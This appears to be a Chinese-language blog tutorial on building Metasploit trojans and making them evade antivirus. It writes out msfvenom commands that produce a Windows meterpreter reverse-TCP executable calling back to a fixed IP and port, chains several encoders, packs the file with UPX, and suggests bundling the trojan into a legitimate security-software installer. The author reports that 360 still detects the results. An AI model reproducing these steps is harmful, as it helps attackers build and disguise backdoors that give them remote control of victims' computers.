MSF木马的生成及免杀
先简单生成一个木马
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/meterpreter/reverse_tcp lhosts=61.139.2.130 lport=3333 -e cmd/echo -i 10 -f exe -o cmd_echo_113_3333_10.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of cmd/echo
cmd/echo succeeded with size 354 (iteration=0)
cmd/echo succeeded with size 354 (iteration=1)
cmd/echo succeeded with size 354 (iteration=2)
cmd/echo succeeded with size 354 (iteration=3)
cmd/echo succeeded with size 354 (iteration=4)
cmd/echo succeeded with size 354 (iteration=5)
cmd/echo succeeded with size 354 (iteration=6)
cmd/echo succeeded with size 354 (iteration=7)
cmd/echo succeeded with size 354 (iteration=8)
cmd/echo succeeded with size 354 (iteration=9)
cmd/echo chosen with final size 354
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: cmd_echo_113_3333_10.exe
这个我都不用试了,都不说360,windows自带的杀软都绕不过去,让我们扔进微步看看怎么个事
最意料之中的一集
这次我们多编码几次看看
┌──(kali㉿kali)-[~]
└─$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=61.139.2.130 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f exe -o payload2.0.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai succeeded with size 651 (iteration=10)
x86/shikata_ga_nai succeeded with size 678 (iteration=11)
x86/shikata_ga_nai succeeded with size 705 (iteration=12)
x86/shikata_ga_nai succeeded with size 732 (iteration=13)
x86/shikata_ga_nai succeeded with size 759 (iteration=14)
x86/shikata_ga_nai succeeded with size 786 (iteration=15)
x86/shikata_ga_nai succeeded with size 813 (iteration=16)
x86/shikata_ga_nai succeeded with size 840 (iteration=17)
x86/shikata_ga_nai succeeded with size 867 (iteration=18)
x86/shikata_ga_nai succeeded with size 894 (iteration=19)
x86/shikata_ga_nai chosen with final size 894
Payload size: 894 bytes
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 1857 (iteration=0)
x86/alpha_upper succeeded with size 3783 (iteration=1)
x86/alpha_upper succeeded with size 7635 (iteration=2)
x86/alpha_upper succeeded with size 15339 (iteration=3)
x86/alpha_upper succeeded with size 30747 (iteration=4)
x86/alpha_upper succeeded with size 61563 (iteration=5)
x86/alpha_upper succeeded with size 123194 (iteration=6)
x86/alpha_upper succeeded with size 246456 (iteration=7)
x86/alpha_upper succeeded with size 492979 (iteration=8)
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
x86/countdown succeeded with size 48 (iteration=2)
x86/countdown succeeded with size 64 (iteration=3)
x86/countdown succeeded with size 80 (iteration=4)
x86/countdown succeeded with size 96 (iteration=5)
x86/countdown succeeded with size 112 (iteration=6)
x86/countdown succeeded with size 128 (iteration=7)
x86/countdown succeeded with size 144 (iteration=8)
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: payload2.0.exe
x86/alpha_upper succeeded with size 986027 (iteration=9)
x86/alpha_upper chosen with final size 986027
Payload size: 986027 bytes
虽然不会落地就杀,但是还是不能运行,一运行就会报病毒
那就让我们试一试UPX加壳
加壳
加壳是一类能够对可执行文件进行加密压缩并将解压代码嵌入其中的工具,当加壳的文件被运行后,解压代码会从已压缩的数据中重建原始程序并运行
用到的是kali自带的upx
┌──(root㉿kali)-[/home/kali]
└─# upx
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2024
UPX 4.2.4 Markus Oberhumer, Laszlo Molnar & John Reiser May 9th 2024
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give more help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
-k keep backup files
file.. executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io
还是被检测到了吗,360,你这家伙
360还是太强悍了,拼尽全力无法战胜
看来想要战胜360大人的话还要再沉淀沉淀
捆绑安装包
其实还有一种方法可以免杀,就是捆绑一个安装包类似火绒的安装包
【注意】Meatsploit 自带了用于捆绑木马的程序模板,其位置在data/templates/template.exe,虽然这个模板经常会更新,但是其仍是各大反病毒木马厂商的关注重点。为了更好地实现免杀,此处自主选择一个待捆绑程序。
但是这样的免杀理论上是没有UPX壳的效果好的,所以我也没测(绝对不是因为懒)
事实上这些杀软厂家也不是吃素的,在市面上能看到的免杀基本都不能免杀了,像是这些工具更是被重点防范,所以还是要靠自己编写才行